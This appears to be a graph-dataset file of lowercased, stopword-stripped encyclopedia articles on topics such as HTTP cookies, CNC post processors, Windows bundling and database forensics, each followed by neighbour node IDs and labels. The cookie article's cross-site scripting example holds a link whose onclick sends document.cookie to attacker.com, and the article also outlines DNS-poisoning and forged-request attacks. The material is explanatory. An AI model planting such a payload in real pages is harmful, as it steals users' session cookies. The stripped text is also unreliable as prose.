Post_processor:post processor post processor unique driver specific cnc machine robot mechanism machines start different locations require extra movement operation post-processor works cam software off-line programming software make sure g-code output program correct specific trademark machine control cabinet fanuc siemens-sinumeric mazak-mazatrol heidenhein deckel-maho etc cam software uses geometry cad model converts g-code cam software analyzes cad model determines tooling toolpaths used mill desired features requires cam post processor generates exact g-code dialect used machine control module sinumeric fanuc mazatrol heidenhein toshiba etc targeted instance translation often referred post different “ post ” g-code dialect cam software supports post processors usually convert g-code one dialect next rather “ post ” uses intermediate format captures g-code commands dialect-independent form cam software accomplishes intermediate format called cl.data please adjust terms post processor software subroutine sub-program converts graphical non-graphical cam software toolpath outcome specific nc control fanuc sinumeric mazatrol heidenhein post processor independent hardware software adapting compiling toolpath machine readable language motions post-processor alter program output suit specific machine post used complex things like producing proprietary machine language g-code m-code post-processor may used start machine specific position another example use post-processor would atc automatic-tool-change cnc post-processor required correct tool collected correct location devices connect computer using serial communication cnc devices connect using parallel communication post-processor influence communication machine software post processors context web development development general
[ 5896, 4121 ]
None
7,965
4
HTTP_cookie:http cookie http cookie also called web cookie internet cookie browser cookie simply cookie small piece data sent website stored user computer user web browser user browsing cookies designed reliable mechanism websites remember stateful information items added shopping cart online store record user browsing activity including clicking particular buttons logging recording pages visited past also used remember arbitrary pieces information user previously entered form fields names addresses passwords credit card numbers cookies perform essential functions modern web perhaps importantly authentication cookies common method used web servers know whether user logged account logged without mechanism site would know whether send page containing sensitive information require user authenticate logging security authentication cookie generally depends security issuing website user web browser whether cookie data encrypted security vulnerabilities may allow cookie data read hacker used gain access user data used gain access user credentials website cookie belongs see cross-site scripting cross-site request forgery examples tracking cookies especially third-party tracking cookies commonly used ways compile long-term records individuals browsing histories potential privacy concern prompted european u.s. lawmakers take action 2011 european law requires websites targeting european union member states gain informed consent users storing non-essential cookies device google project zero researcher jann horn describes ways cookies read intermediaries like wi-fi hotspot providers recommends use browser incognito mode circumstances term cookie coined web browser programmer lou montulli derived term magic cookie packet data program receives sends back unchanged used unix programmers magic cookies already used computing computer programmer lou montulli idea using web communications june 1994 time employee netscape communications developing e-commerce application mci vint cerf john klensin represented mci technical discussions netscape communications mci want servers retain partial transaction states led ask netscape find way store state user computer instead cookies provided solution problem reliably implementing virtual shopping cart together john giannandrea montulli wrote initial netscape cookie specification year version 0.9beta mosaic netscape released october 13 1994 supported cookies first use cookies labs checking whether visitors netscape website already visited site montulli applied patent cookie technology 1995 granted 1998 support cookies integrated internet explorer version 2 released october 1995 introduction cookies widely known public time particular cookies accepted default users notified presence general public learned cookies financial times published article february 12 1996 year cookies received lot media attention especially potential privacy implications cookies discussed two u.s. federal trade commission hearings 1996 1997 development formal cookie specifications already ongoing particular first discussions formal specification started april 1995 www-talk mailing list special working group within internet engineering task force ietf formed two alternative proposals introducing state http transactions proposed brian behlendorf david kristol respectively group headed kristol lou montulli soon decided use netscape specification starting point february 1996 working group identified third-party cookies considerable privacy threat specification produced group eventually published rfc 2109 february 1997 specifies third-party cookies either allowed least enabled default time advertising companies already using third-party cookies recommendation third-party cookies rfc 2109 followed netscape internet explorer rfc 2109 superseded rfc 2965 october 2000 rfc 2965 added codice_1 header informally came called rfc 2965-style cookies opposed original codice_2 header called netscape-style cookies codice_1 seldom used however deprecated rfc 6265 april 2011 written definitive specification cookies used real world session cookie also known in-memory cookie transient cookie non-persistent cookie exists temporary memory user navigates website web browsers normally delete session cookies user closes browser unlike cookies session cookies expiration date assigned browser knows treat session cookies instead expiring web browser closed session cookies persistent cookie expires specific date specific length time means cookie entire lifespan long short creators want information transmitted server every time user visits website belongs every time user views resource belonging website another website advertisement reason persistent cookies sometimes referred tracking cookies used advertisers record information user web browsing habits extended period time however also used legitimate reasons keeping users logged accounts websites avoid re-entering login credentials every visit secure cookie transmitted encrypted connection i.e https transmitted unencrypted connections i.e http makes cookie less likely exposed cookie theft via eavesdropping cookie made secure adding codice_4 flag cookie http-only cookie accessed client-side apis javascript restriction eliminates threat cookie theft via cross-site scripting xss however cookie remains vulnerable cross-site tracing xst cross-site request forgery xsrf attacks cookie given characteristic adding codice_5 flag cookie 2016 google chrome version 51 introduced new kind cookie same-site cookie sent requests originating origin target domain restriction mitigates attacks cross-site request forgery xsrf cookie given characteristic setting codice_6 flag codice_7 codice_8 normally cookie domain attribute match domain shown web browser address bar called first-party cookie third-party cookie however belongs domain different one shown address bar sort cookie typically appears web pages feature content external websites banner advertisements opens potential tracking user browsing history often used advertisers effort serve relevant advertisements user example suppose user visits codice_9 website contains advertisement codice_10 downloaded sets cookie belonging advertisement domain codice_10 user visits another website codice_12 also contains advertisement codice_10 sets cookie belonging domain codice_10 eventually cookies sent advertiser loading advertisements visiting website advertiser use cookies build browsing history user across websites ads advertiser websites setting cookies readable 100 third-party domains average single website setting 10 cookies maximum number cookies first- third-party reaching 800 modern web browsers contain privacy settings block third-party cookies supercookie cookie origin top-level domain codice_15 public suffix codice_16 ordinary cookies contrast origin specific domain name codice_17 supercookies potential security concern therefore often blocked web browsers unblocked browser attacker control malicious website could set supercookie potentially disrupt impersonate legitimate user requests another website shares top-level domain public suffix malicious website example supercookie origin codice_15 could maliciously affect request made codice_17 even cookie originate codice_17 used fake logins change user information public suffix list helps mitigate risk supercookies pose public suffix list cross-vendor initiative aims provide accurate up-to-date list domain name suffixes older versions browsers may up-to-date list therefore vulnerable supercookies certain domains term supercookie sometimes used tracking technologies rely http cookies two supercookie mechanisms found microsoft websites august 2011 cookie syncing respawned muid machine unique identifier cookies etag cookies due media attention microsoft later disabled code zombie cookie cookie automatically recreated deleted accomplished storing cookie content multiple locations flash local shared object html5 web storage client-side even server-side locations cookie absence detected cookie recreated using data stored locations cookie consists following components cookies originally introduced provide way users record items want purchase navigate throughout website virtual shopping cart shopping basket today however contents user shopping cart usually stored database server rather cookie client keep track user assigned shopping cart server sends cookie client contains unique session identifier typically long string random letters numbers cookies sent server every request client makes session identifier sent back server every time user visits new page website lets server know shopping cart display user another popular use cookies logging websites user visits website login page web server typically sends client cookie containing unique session identifier user successfully logs server remembers particular session identifier authenticated grants user access services session cookies contain unique session identifier makes amount personal information website save user virtually limitless—the website limited restrictions concerning large cookie session cookies also help improve page load times since amount information session cookie small requires little bandwidth cookies used remember information user order show relevant content user time example web server might send cookie containing username last used log website may filled automatically next time user logs many websites use cookies personalization based user preferences users select preferences entering web form submitting form server server encodes preferences cookie sends cookie back browser way every time user accesses page website server personalize page according user preferences example google search engine used cookies allow users even non-registered ones decide many search results per page wanted see also duckduckgo uses cookies allow users set viewing preferences like colors web page tracking cookies used track users web browsing habits also done extent using ip address computer requesting page referer field http request header cookies allow greater precision demonstrated follows analyzing log file possible find pages user visited sequence long corporations exploit users web habits tracking cookies collect information buying habits wall street journal found america top fifty websites installed average sixty-four pieces tracking technology onto computers resulting total 3,180 tracking files data collected sold bidding corporations cookies arbitrary pieces data usually chosen first sent web server stored client computer web browser browser sends back server every request introducing states memory previous events otherwise stateless http transactions without cookies retrieval web page component web page would isolated event largely unrelated page views made user website although cookies usually set web server also set client using scripting language javascript unless cookie codice_5 flag set case cookie modified scripting languages cookie specifications require browsers meet following requirements order support cookies cookies set using codice_2 http header sent http response web server header instructs web browser store cookie send back future requests server browser ignore header support cookies disabled cookies example browser sends first request homepage codice_9 website get /index.html http/1.1 host www.example.org server responds two codice_2 headers http/1.0 200 ok content-type text/html set-cookie theme=light set-cookie sessiontoken=abc123 expires=wed 09 jun 2021 10:18:14 gmt server http response contains contents website homepage also instructs browser set two cookies first theme considered session cookie since codice_27 codice_28 attribute session cookies intended deleted browser browser closes second sessiontoken considered persistent cookie since contains codice_27 attribute instructs browser delete cookie specific date time next browser sends another request visit codice_30 page website request contains codice_31 http header contains two cookies server instructed browser set get /spec.html http/1.1 host www.example.org cookie theme=light sessiontoken=abc123 way server knows request related previous one server would answer sending requested page possibly including codice_2 headers response order add new cookies modify existing cookies delete cookies value cookie modified server including codice_2 header response page request browser replaces old value new value value cookie may consist printable ascii character codice_34 codice_35 unicode codice_36 codice_37 excluding codice_38 codice_39 whitespace characters name cookie excludes characters well codice_40 since delimiter name value cookie standard rfc 2965 restrictive implemented browsers term cookie crumb sometimes used refer cookie name–value pair cookies also set scripting languages javascript run within browser javascript object codice_41 used purpose example instruction codice_42 creates cookie name temperature value 20 addition name value cookies also one attributes browsers include cookie attributes requests server—they send cookie name value cookie attributes used browsers determine delete cookie block cookie whether send cookie server codice_43 codice_44 attributes define scope cookie essentially tell browser website cookie belongs obvious security reasons cookies set current resource top domain sub domains another domain sub domains example website codice_45 set cookie domain codice_46 would allow codice_45 website control cookies codice_46 cookie codice_43 codice_44 attributes specified server default domain path resource requested however browsers difference cookie set codice_46 without domain cookie set codice_46 domain former case cookie sent requests codice_46 also known host-only cookie latter case sub domains also included example codice_54 notable exception general rule edge prior windows 10 rs3 internet explorer prior ie 11 windows 10 rs4 april 2018 always send cookies sub domains regardless whether cookie set without domain example codice_2 http response headers sent website user logged http request sent webpage within codice_54 subdomain http/1.0 200 ok set-cookie lsid=dqaaak…eaem_vyg path=/accounts expires=wed 13 jan 2021 22:23:01 gmt secure httponly set-cookie hsid=ayqevn…dkrdst domain=.foo.com path=/ expires=wed 13 jan 2021 22:23:01 gmt httponly set-cookie ssid=ap4p…gteq domain=foo.com path=/ expires=wed 13 jan 2021 22:23:01 gmt secure httponly first cookie codice_57 codice_43 attribute codice_44 attribute set codice_60 tells browser use cookie requesting pages contained codice_61 domain derived request domain two cookies codice_62 codice_63 would used browser requests subdomain codice_64 path example codice_65 prepending dot optional recent standards added compatibility rfc 2109 based implementations codice_27 attribute defines specific date time browser delete cookie date time specified form codice_67 form codice_68 values yy yy greater equal 0 less equal 69 alternatively codice_28 attribute used set cookie expiration interval seconds future relative time browser received cookie example three codice_2 headers received website user logged http/1.0 200 ok set-cookie lu=rg3vhjznehyljvg7qi3bzjzg expires=tue 15 jan 2013 21:47:38 gmt path=/ domain=.example.com httponly set-cookie made_write_conn=1295214458 path=/ domain=.example.com set-cookie reg_fb_gate=deleted expires=thu 01 jan 1970 00:00:01 gmt path=/ domain=.example.com httponly first cookie codice_71 set expire sometime 15 january 2013 used client browser time second cookie codice_72 expiration date making session cookie deleted user closes browser third cookie codice_73 value changed deleted expiration time past browser delete cookie right away expiration time past note cookie deleted domain path attributes codice_2 field match values used cookie created codice_4 codice_5 attributes associated values rather presence attribute names indicates behaviors enabled codice_4 attribute meant keep cookie communication limited encrypted transmission directing browsers use cookies via secure/encrypted connections however web server sets cookie secure attribute non-secure connection cookie still intercepted sent user man-in-the-middle attacks therefore maximum security cookies secure attribute set secure connection codice_5 attribute directs browsers expose cookies channels http https requests means cookie accessed via client-side scripting languages notably javascript therefore stolen easily via cross-site scripting pervasive attack technique modern browsers support cookies allow user disable following common options default internet explorer allows third-party cookies accompanied p3p cp compact policy field add-on tools managing cookie permissions also exist cookies important implications privacy anonymity web users cookies sent server setting server internet domain web page may contain images components stored servers domains cookies set retrieval components called third-party cookies older standards cookies rfc 2109 rfc 2965 specify browsers protect user privacy allow sharing cookies servers default however newer standard rfc 6265 explicitly allows user agents implement whichever third-party cookie policy wish browsers mozilla firefox internet explorer opera google chrome allow third-party cookies default long third-party website compact privacy policy published newer versions safari block third-party cookies planned mozilla firefox well initially planned version 22 postponed indefinitely advertising companies use third-party cookies track user across multiple sites particular advertising company track user across pages placed advertising images web bugs knowledge pages visited user allows advertising company target advertisements user presumed preferences website operators disclose third-party cookie use consumers run risk harming consumer trust cookie use discovered clear disclosure privacy policy tends eliminate negative effects cookie discovery possibility building profile users privacy threat especially tracking done across multiple domains using third-party cookies reason countries legislation cookies united states government set strict rules setting cookies 2000 disclosed white house drug policy office used cookies track computer users viewing online anti-drug advertising 2002 privacy activist daniel brandt found cia leaving persistent cookies computers visited website notified violating policy cia stated cookies intentionally set stopped setting december 25 2005 brandt discovered national security agency nsa leaving two persistent cookies visitors computers due software upgrade informed nsa immediately disabled cookies 2002 european union launched directive privacy electronic communications policy requiring end users consent placement cookies similar technologies storing accessing information users equipment particular article 5 paragraph 3 mandates storing data user computer done user provided information data used user given possibility denying storing operation directive 95/46/ec defines data subject consent freely given specific informed indication wishes data subject signifies agreement personal data relating processed consent must involve form communication individuals knowingly indicate acceptance 2009 policy amended directive 2009/136/ec included change article 5 paragraph 3 instead option users opt cookie storage revised directive requires consent obtained cookie storage june 2012 european data protection authorities adopted opinion clarifies cookie users might exempt requirement gain consent industry response largely negative robert bond law firm speechly bircham describes effects far-reaching incredibly onerous uk companies simon davis privacy international argues proper enforcement would destroy entire industry p3p specification offers possibility server state privacy policy using http header specifies kind information collects purpose policies include limited use information gathered using cookies according p3p specification browser accept reject cookies comparing privacy policy stored user preferences ask user presenting privacy policy declared server however p3p specification criticized web developers complexity websites correctly implement example facebook jokingly used honk p3p header period internet explorer provides adequate support specification third-party cookies blocked browsers increase privacy reduce tracking advertising tracking companies without negatively affecting user web experience many advertising operators opt-out option behavioural advertising generic cookie browser stopping behavioural advertising websites use cookies identifiers user sessions methods identifying web users limitations vulnerabilities website uses cookies session identifiers attackers impersonate users requests stealing full set victims cookies web server point view request attacker authentication victim requests thus request performed behalf victim session listed various scenarios cookie theft user session hijacking even without stealing user cookies work websites relying solely http cookies user identification traffic network intercepted read computers network sender receiver particularly unencrypted open wi-fi traffic includes cookies sent ordinary unencrypted http sessions network traffic encrypted attackers therefore read communications users network including http cookies well entire contents conversations purpose man-in-the-middle attack attacker could use intercepted cookies impersonate user perform malicious task transferring money victim bank account issue resolved securing communication user computer server employing transport layer security https protocol encrypt connection server specify codice_4 flag setting cookie cause browser send cookie encrypted channel tls connection attacker able cause dns server cache fabricated dns entry called dns cache poisoning could allow attacker gain access user cookies example attacker could use dns cache poisoning create fabricated dns entry codice_81 points ip address attacker server attacker post image url server example codice_82 victims reading attacker message would download image codice_81 since codice_81 sub-domain codice_85 victims browsers would submit codice_17-related cookies attacker server attacker able accomplish usually fault internet service providers properly securing dns servers however severity attack lessened target website uses secure cookies case attacker would extra challenge obtaining target website tls certificate certificate authority since secure cookies transmitted encrypted connection without matching tls certificate victims browsers would display warning message attacker invalid certificate would help deter users visiting attacker fraudulent website sending attacker cookies cookies also stolen using technique called cross-site scripting occurs attacker takes advantage website allows users post unfiltered html javascript content posting malicious html javascript code attacker cause victim web browser send victim cookies website attacker controls example attacker may post message codice_85 following link href= onclick= window.location 'http //attacker.com/stole.cgi text= escape document.cookie return false click /a another user clicks link browser executes piece code within codice_88 attribute thus replacing string codice_41 list cookies accessible current page result list cookies sent codice_90 server attacker malicious posting https website codice_91 secure cookies also sent attacker.com plain text responsibility website developers filter malicious code attacks mitigated using httponly cookies cookies accessible client-side scripting languages like javascript therefore attacker able gather cookies older versions many browsers security holes implementation xmlhttprequest api api allows pages specify proxy server would get reply proxy server subject same-origin policy example victim reading attacker posting codice_85 attacker script executed victim browser script generates request codice_85 proxy server codice_90 since request codice_85 codice_17 cookies sent along request routed attacker proxy server hence attacker would able harvest victim cookies attack would work secure cookies since transmitted https connections https protocol dictates end-to-end encryption i.e information encrypted user browser decrypted destination server case proxy server would see raw encrypted bytes http request example bob might browsing chat forum another user mallory posted message suppose mallory crafted html image element references action bob bank website rather image file e.g. bob bank keeps authentication information cookie cookie n't expired attempt bob browser load image submit withdrawal form cookie thus authorizing transaction without bob approval cookiejacking form hacking wherein attacker gain access session cookies internet explorer user discovered rosario valotta internet security researcher exploit allows attacker obtain cookie site thus username password tricking user dragging object across screen although microsoft deemed flaw low-risk level required user interaction necessity user already logged website whose cookie stolen valotta able use social engineering attack obtain three days cookies 80 facebook users 150 friends besides privacy concerns cookies also technical drawbacks particular always accurately identify users used security attacks often odds representational state transfer rest software architectural style one browser used computer usually separate storage area cookies hence cookies identify person combination user account computer web browser thus anyone uses multiple accounts computers browsers multiple sets cookies likewise cookies differentiate multiple users share user account computer browser use cookies may generate inconsistency state client state stored cookie user acquires cookie clicks back button browser state browser generally acquisition example shopping cart online shop built using cookies content cart may change user goes back browser history user presses button add item shopping cart clicks back button item remains shopping cart might intention user possibly wanted undo addition item lead unreliability confusion bugs web developers therefore aware issue implement measures handle situations operations done using cookies also done using mechanisms json web token jwt self-contained packet information used store user identity authenticity information allows used place session cookies unlike cookies automatically attached http request browser jwts must explicitly attached http request web application http protocol includes basic access authentication digest access authentication protocols allow access web page user provided correct username password server requires credentials granting access web page browser requests user obtained browser stores sends every subsequent page request information used track user users may tracked based ip address computer requesting page server knows ip address computer running browser proxy used could theoretically link user session ip address however ip addresses generally reliable way track session identify user many computers designed used single user office pcs home pcs behind network address translator nat means several pcs share public ip address furthermore systems tor designed retain internet anonymity rendering tracking ip address impractical impossible security risk precise technique based embedding information urls query string part url part typically used purpose parts used well java servlet php session mechanisms use method cookies enabled method consists web server appending query strings containing unique session identifier links inside web page user follows link browser sends query string server allowing server identify user maintain state kinds query strings similar cookies contain arbitrary pieces information chosen server sent back server every request however differences since query string part url url later reused attached piece information sent server could lead confusion example preferences user encoded query string url user sends url another user e-mail preferences used user well moreover user accesses page multiple times different sources guarantee query string used time example user visits page coming page internal site first time visits page coming external search engine second time query strings would likely different cookies used situation cookies would drawbacks query strings related security storing data identifies session query string enables session fixation attacks referer logging attacks security exploits transferring session identifiers http cookies secure another form session tracking use web forms hidden fields technique similar using url query strings hold information many advantages drawbacks fact form handled http get method technique similar using url query strings since get method adds form fields url query string forms handled http post causes form information including hidden fields sent http request body neither part url cookie approach presents two advantages point view tracker first tracking information placed http request body rather url means noticed average user second session information copied user copies url bookmark page send via email example current web browsers store fairly large amount data 2–32 mb via javascript using dom property codice_97 data used instead session cookies also cross-domain technique coupled json/javascript objects store complex sets session variables client side downside every separate window tab initially empty codice_97 property opened furthermore property used tracking visitors across different websites making concern internet privacy respects secure cookies due fact contents automatically sent server every request like cookies vulnerable network cookie sniffing attacks however special measures taken protect data vulnerable attacks data available across different websites opened window tab apple uses tracking technique called identifier advertisers idfa technique assigns unique identifier every user buys apple ios device iphone ipad identifier used apple advertising network iad determine ads individuals viewing responding etags cached browser returned subsequent requests resource tracking server simply repeat etag received browser ensure assigned etag persists indefinitely similar way persistent cookies additional caching headers also enhance preservation etag data etags flushed browsers clearing browser cache web browsers support persistence mechanisms allow page store information locally later use html5 standard modern web browsers support extent includes javascript api called web storage allows two types storage local storage session storage local storage behaves similarly persistent cookies session storage behaves similarly session cookies except session storage tied individual tab/window lifetime aka page session whole browser session like session cookies internet explorer supports persistent information browser history browser favorites xml store user data directly within web page saved disk web browser plugins include persistence mechanisms well example adobe flash local shared object microsoft silverlight isolated storage browser cache also used store information used track individual users technique takes advantage fact web browser use resources stored within cache instead downloading website determines cache already up-to-date version resource example website could serve javascript file code sets unique identifier user example codice_99 user initial visit every time user accesses page file loaded cache instead downloaded server thus content never change browser fingerprint information collected browser configuration version number screen resolution operating system purpose identification fingerprints used fully partially identify individual users devices even cookies turned basic web browser configuration information long collected web analytics services effort accurately measure real human web traffic discount various forms click fraud assistance client-side scripting languages collection much esoteric parameters possible assimilation information single string comprises device fingerprint 2010 eff measured least 18.1 bits entropy possible browser fingerprinting canvas fingerprinting recent technique claims add another 5.7 bits
[ 513, 6657, 517, 9736, 9233, 9746, 2579, 6171, 9757, 5150, 8735, 7713, 10791, 9770, 559, 2099, 4661, 3639, 10808, 11319, 2106, 3643, 9275, 64, 5707, 11345, 10834, 87, 6231, 8281, 6747, 5724, 607, 4198, 3688, 1642, 9834, 9841, 115, 3187, ...
None
7,966
3
Space_Shuttle:_A_Journey_into_Space:space shuttle journey space space shuttle journey space space flight simulator game designed steve kitchen atari 2600 published activision 1983 one first realistic spacecraft simulations available home systems space shuttle adapted atari 8-bit family atari 5200 bob henderson 1984 ported zx spectrum 1984 commodore 64 1984 amstrad cpc 1986 msx 1986 1984 activision software catalog also mentions apple ii version player controls critical flight phases launch stabilizing orbit docking deorbit burn reentry landing set instructions follow original atari 2600 version came overlay since made use switches april 1984 review video games magazine dan persons wrote space shuttle game everybody requires considerable amount patience perhaps surprisingly considerable amount brainpower players seek visceral thrills standard shoot'em-up may ultimately find simulation complexity frustrating ready richer sophisticated experience probably recognize space shuttle monumental achievement
[ 9006 ]
None
7,967
8
Sawmill_(software):sawmill software sawmill software package statistical analysis reporting log files dynamic contextual filtering 'live data zooming user interface customization custom calculated reports sawmill also incorporates real-time reporting real-time alerting available since 1997 time sawmill provides support approximately 850 server log file formats new formats added request sawmill also includes page tagging server javascript page tag analysis client side clicks client requests providing total view visitor traffic on-site behavioural activity sawmill analytics offered three forms software package user deployment turnkey on-premises system appliance saas sawmill analyzes device software package producing log file includes web servers firewalls proxy servers mail servers network devices switches routers etc syslog servers databases etc sawmill oem reporting engine sold blue coat systems bundled part proxy server product branded version also sold cisco systems sawmill ironport branded version also sold vicomsoft ltd intergate intelligence branded version also sold sonicwall sonicwall aventail advanced reporting sawmill second runner-up 2009 streaming media european readers choice awards sawmill listed ideal observer web analytics tool overview
[ 3520, 225, 4033, 6273, 8998, 5612, 8941, 7983, 6576, 6834, 467, 2901, 4725, 1943, 8821, 2045 ]
Test
7,968
1
Database_forensics:database forensics database forensics branch digital forensic science relating forensic study databases related metadata discipline similar computer forensics following normal forensic process applying investigative techniques database contents metadata cached information may also exist servers ram requiring live analysis techniques forensic examination database may relate timestamps apply update time row relational table inspected tested validity order verify actions database user alternatively forensic examination may focus identifying transactions within database system application indicate evidence wrongdoing fraud software tools used manipulate analyse data tools also provide audit logging capabilities provide documented proof tasks analysis forensic examiner performed database currently many database software tools general reliable precise enough used forensic work demonstrated first paper published database forensics currently single book published field though destined additionally subsequent sql server forensics book kevvie fowler named sql server forensics well regarded also forensic study relational databases requires knowledge standard used encode data computer disk documentation standards used encode information well-known brands db sql server oracle contributed public domain others include apex analytix forensic analysis database executed isolation technological framework within subject database exists crucial understanding resolving questions data authenticity integrity especially relates database users
[ 2688, 2437, 7560, 9481, 10505, 5010, 10258, 4500, 8469, 10518, 4376, 9112, 3099, 6177, 290, 1314, 5284, 7461, 8742, 5550, 11182, 5808, 10290, 10418, 4789, 9527, 3768, 8635, 3004, 9661, 2494, 830, 4416, 2369, 5441, 9663, 11457, 8518, 72, 7...
Test
7,969
6
Block_availability_map:block availability map computer file systems block availability map bam data structure used track disk blocks considered free available new data used along directory manage files disk originally floppy disk later also hard disk terms commodore dos cbm dos compatible disk drives bam data structure stored reserved area disk size location varied based physical characteristics disk track bam consisted bitmap available blocks usually count available blocks count held single byte formats 256 fewer blocks per track count byte simply sum 1-bits bitmap bytes current track following table illustrates layout commodore 1541 bam table would larger higher-capacity disks described bitmap contained 3 bytes commodore 1541 format single-sided disks 17 20 sectors per track note 3 bytes hold least 20 bits similarly commodore 1571 used 3 bytes bitmap track bam twice size twice many tracks formatted double-sided contrast commodore 1581 disk drive used 5 bytes bitmap disk format 40 blocks per track note 5 bytes hold 40 bits bitmap format 1 bit indicated block available free 0 bit indicated block available used bitmap data stored low-byte first first byte held map blocks 0 7 second byte held map blocks 8 15 within byte bitmap ordered low-bit first example first byte would represent block 0 least significant bit block 7 significant bit storage devices creative micro designs intended use cbm computers also used block availability map served purpose however devices fd-2000 fd-4000 cmd-hd include count byte bits byte reversed high-bit first although bits reversed compared cbm formats bytes still stored order low-byte first
[ 9762, 3315, 2933, 3257, 6843, 4764 ]
Test
7,970
2
Bundling_of_Microsoft_Windows:bundling microsoft windows bundling microsoft windows installation microsoft windows computers purchase microsoft encourages original equipment manufacturers oems personal computers include windows licenses products agreements microsoft oems undergone antitrust scrutiny users opposed bundling microsoft windows sought refunds windows licenses arguing windows end-user license agreement entitles return unused windows licenses cash refund although customers successfully obtained payments cases litigation lengthy negotiations others less successful microsoft encourages original equipment manufacturers oems supply computers windows pre-installed saying consumers benefit install operating system analyst vishal tripathi said many consumers purchase pcs pre-installed operating systems want deal learning curve inconvenience installing operating system virtually large computer vendors bundle microsoft windows majority personal computers ranges 1999 maximum pc wrote non-windows users long griped machines large companies ca n't purchased without windows 1999 analyst rob enderle attributed lack computers without windows available individual purchase economic impracticality citing certification warranty requirements 1999 dell stated offered non-microsoft operating systems servers part customized large orders linux became popular enough make linux pre-installation cost-effective 'd foolish offer guardian computer editor jack schofield said significant overhead costs associated pre-installation linux part due linux small market share serdar yegulalp computerworld said late 1990s linux fully developed linux computers tough sell non-technical users microsoft historically engaged licensing practices discouraged installation non-microsoft operating systems microsoft assessed license fees based number computers oem sold regardless whether windows license included beginning 1983 microsoft sold ms-dos licenses oems individually-negotiated basis contracts required oems purchase number ms-dos licenses equal greater number computers sold result zero marginal cost oems include ms-dos installing operating system ms-dos would effectively require double payment operating system royalties also microsoft penalized oems installed alternative operating systems making license terms less favorable microsoft entered consent decree 1994 barred microsoft conditioning availability windows licenses varying prices based whether oems distributed operating systems microsoft general counsel brad smith said decree effective allowing dell hp offer linux computers jeremy reimer ars technica stated decree made fiscally realistic sell computers alternative operating systems 1999 microsoft representative stated contracts oems stop oem shipping operating system pcs 2010 microsoft stated agreements oems distribute windows nonexclusive oems free distribute computers different operating system without operating system 2001 article byte reported license agreements oems microsoft forbade oems including windows alongside another operating system computer according 1999 new york times article critics assert company continues use market clout ensure nearly new personal computers come windows pre-installed 2009 microsoft stated always charged oems 50 windows license 1,000 computer 2007 dell stated computers ubuntu installed would priced 50 lower comparable systems windows installed 2010 zdnet article chris clay wrote dell computers ubuntu preinstalled priced higher identical systems windows preinstalled even though ubuntu free open source claimed increase price computer resulting inclusion windows license called windows tax microsoft tax opposing computer users computer purchasers request refunds windows licenses included purchased computers want use windows preferring operating system linux instead jeff walsh infoworld said businesses site licenses save money requesting refunds windows licenses included purchased computers users avoid windows tax altogether assembling computer individually purchased parts purchasing computer oem bundle windows smaller oems larger retail chains system76 taken specializing linux-based systems advantage major suppliers paucity non-windows offerings beginning 2007 dell offered computers ubuntu pre-installed 2014 hewlett-packard stated sells units bundled built-in os without linux distributors also run 'partnership programs endorse suppliers machines system pre-installed vendors purchase computers major oems install linux resell chris clay zdnet wrote employee discount programs create financial incentive purchase computers large manufacturer even manufacturer offer computers without windows microsoft requires oems support uefi secure boot products qualify windows 8 logo program concerns raised oems might ship systems allow users disable secure boot install signing keys alternative operating systems computers would unable boot non-windows operating system unless operating system signed keys included computer complicating issue windows refunds microsoft claims oems would free decide keys include manage competing os vendors relative lack influence desktop os market compared microsoft might mean even signed versions operating systems available might face difficulties getting hardware vendors include keys especially end users wo n't able manage keys boot locking required arm devices microsoft provide refunds windows licenses sold oem including licenses come purchase computer pre-installed computer microsoft denmark representative stated microsoft windows license terms allow oems offer refund windows license microsoft end user license agreement windows 10 states 1999 relevant text read 1999 according infoworld users taking eula literally plan demand cash refund 1999 microsoft representative described requesting windows refund basis rejecting license technicality someone twisting language little bit come idea run back oem laurie j. flynn new york times characterized license refund argument using loophole license agreement oem policies refunding unused windows licenses vary oems programs specifically allow user receive refund unused windows license acer us windows refund program user ship computer unused copy windows acer service center computer returned without windows refund acer policy requires customer return items expense balance received customer low €30 applies eu reported refund 2014 €40 windows 8 vendors like dell ad hoc procedures users request refund windows license one user received £55.23 refund dell said process pretty gob-smacked easy cases vendors asked customers requesting refunds sign non-disclosure agreements 1999 toshiba representative stated case user obtained 110 refund typical policy people run try vendors issue refunds windows licenses february 1999 infoworld reported pc manufacturers currently offering refunds users use windows according 1999 maximum pc article dell provide refunds windows licenses interpreting license agreement treat hardware software single package must returned 2009 sony refused offer partial refund customer declined windows vista eula instead offering refund entire computer consumer declined litigation users denied partial refund unused windows license resulted rulings france italy bundling microsoft windows refusing offer partial refunds windows license violates applicable law september 2014 supreme court italy ruling 19161/2014 decided laptop buyer entitled receive refund €140 price microsoft windows license microsoft works license computer saying bundling commercial policy forced distribution slammed practice monopolistic tendency india bundling challenged users violation competition act 2002 one sent legal notice hp however another license refund case french appellate court ruled favor oem holding sale issue constitute unfair commercial practice coercive selling permitted circumstances unfair commercial tying practice misleading aggressive commercial practice case pending court cassation september 2016 court justice european union ruled sale computer equipped pre-installed software constitute unfair commercial practice within meaning directive 2005/29 offer contrary requirements professional diligence distort economic behaviour consumers court also ruled directive 2005/29 require oems include separate price operating system license websites created specific purpose spreading information issue educating others options getting refund 1999 rally opposing bundling windows attracted 100 protesters gained media attention worldwide overall goal events get oems expand selection computers without copy windows pre-installed additional goal getting revise improve refund policies first goal met analyst stated refund actions individual users publicity stunt impact
[ 259, 4356, 11524, 6150, 5384, 6797, 782, 1935, 2196, 3605, 10900, 11030, 3224, 8092, 11549, 7838, 7456, 929, 5666, 3875, 11559, 1832, 6441, 6827, 7215, 3890, 11060, 8757, 823, 7359, 4289, 194, 3527, 9033, 6476, 10957, 4816, 4051, 9812, 11...
Validation
7,971
9
Java_Data_Mining:java data mining java data mining jdm standard java api developing data mining applications tools jdm defines object model java api data mining objects processes jdm enables applications integrate data mining technology developing predictive analytics applications tools jdm 1.0 standard developed java community process jsr 73 2006 jdm 2.0 specification developed jsr 247 withdrawn 2011 without standardization various data mining functions techniques like statistical classification association regression analysis data clustering attribute importance covered 1.0 release standard never received wide acceptance known implementation
[ 4960, 8262 ]
None
7,972
5
